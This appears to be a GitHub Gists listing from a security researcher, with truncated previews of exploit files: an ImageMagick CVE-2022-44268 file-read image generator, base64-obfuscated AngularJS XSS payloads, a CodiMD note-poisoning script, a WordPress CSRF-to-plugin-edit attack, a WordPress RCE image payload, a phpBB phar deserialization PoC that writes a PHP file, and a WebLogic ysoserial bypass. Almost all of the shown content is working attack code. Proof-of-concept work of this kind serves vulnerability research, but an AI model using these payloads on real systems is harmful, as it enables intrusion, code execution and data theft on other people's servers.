View CVE-2022-44268.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import struct | |
import zlib | |
import argparse | |
parser = argparse.ArgumentParser() | |
parser.add_argument("-s", "--size", type=int, default=256, help="size of an image in px (default: 256)") | |
parser.add_argument("-f", "--file", type=str, default="/etc/passwd", help="local file to read (default: /etc/passwd)") | |
parser.add_argument("-o", "--output", type=str, default="expl.png", help="output expoit image name (default: expl.png)") | |
parser.add_argument("-i", "--input", type=str, help="an image name for parse, if specified then the script only parses the result") |
View ajp-packet.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
def pack_string(s): | |
if s is None: | |
return struct.pack(">h", -1) | |
l = len(s) | |
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) | |
magic = 0x1234 | |
prefix_code = struct.pack("b", 2) # forward request |
View xss-payload.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- attr="--> | |
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js> | |
</script> | |
<div ng-app> | |
{{constructor.constructor('eval(atob(\'dmFyIGhvc3Q9ZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUrIjoiK2RvY3VtZW50LmxvY2F0aW9uLnBvcnQsbm90ZWR1bW15PSIvLyIraG9zdCsiL3NvY2tldC5pby8/bm90ZUlkPU5PVEVfSUQmRUlPPTMiLHBheWxvYWQ9Ilx4M2MhLS0gYXR0cj1cIi0tXHgzZTxzY3JpcHQgc3JjPWh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuZ3VsYXIuanMvMS4wLjEvYW5ndWxhci5taW4uanM+PFwvc2NyaXB0PjxkaXYgbmctYXBwPnt7Y29uc3RydWN0b3IuY29uc3RydWN0b3IoJ2FsZXJ0KDEpJykoKX19PC9kaXY+XCIgLS1ceDNlXG4iOyQuZ2V0KCIvbWUiLGZ1bmN0aW9uKG8peyJvayI9PW8uc3RhdHVzJiYkLmdldCgiL2hpc3RvcnkiLGZ1bmN0aW9uKG8pe2lmKDA8by5oaXN0b3J5Lmxlbmd0aClmb3IoaCBpbiBvLmhpc3RvcnkpeyFmdW5jdGlvbihvKXt2YXIgdD1pby5jb25uZWN0KHtwYXRoOiIvc29ja2V0LmlvLyIscXVlcnk6e25vdGVJZDpvfSx0aW1lb3V0OjVlMyxyZWNvbm5lY3Rpb25BdHRlbXB0czoyMCxmb3JjZU5ldzohMH0pO3Qub24oImNvbm5lY3QiLGZ1bmN0aW9uKG8pe30pLHQub25jZSgiZG9jIixmdW5jdGlvbihvKXtjb25zb2xlLmxvZyhvLnN0ciksLTE9PW8uc3RyLnNlYXJjaCgibmctYXBwIikmJnQuZW1 |
View codimd-notes-poison.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var host = document.location.hostname + ':' + document.location.port; | |
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3'; | |
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n'; | |
$.get('/me', function(data){ | |
if(data.status=="ok") { | |
$.get('/history', function(data) { | |
if(data.history.length > 0) { | |
for(h in data.history) { | |
var currentNoteId = data.history[h].id; |
View csrf.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<form action="http://wpxss.vh/wp-comments-post.php" method="POST"> | |
<input type="text" name="comment" value="<a title='xss" style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob("dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld |
View wordpress-rce.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
View poc.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// All greets goes to RIPS Tech | |
// Run this JS on Attachment Settings ACP page | |
var plupload_salt = ''; | |
var form_token = ''; | |
var creation_time = ''; | |
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip | |
// your payload here | |
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00 |
View JRMPClient_20180718_bypass01.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team | |
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ | |
package ysoserial.payloads; | |
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; | |
import sun.rmi.server.UnicastRef; | |
import sun.rmi.transport.LiveRef; | |
import sun.rmi.transport.tcp.TCPEndpoint; | |
import ysoserial.payloads.annotation.Authors; | |
import ysoserial.payloads.annotation.PayloadTest; |
View script-loader.calls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" ); | |
... | |
078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 ); | |
... | |
086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 ); | |
... | |
088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 ); | |
... | |
090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 ); | |
... |
NewerOlder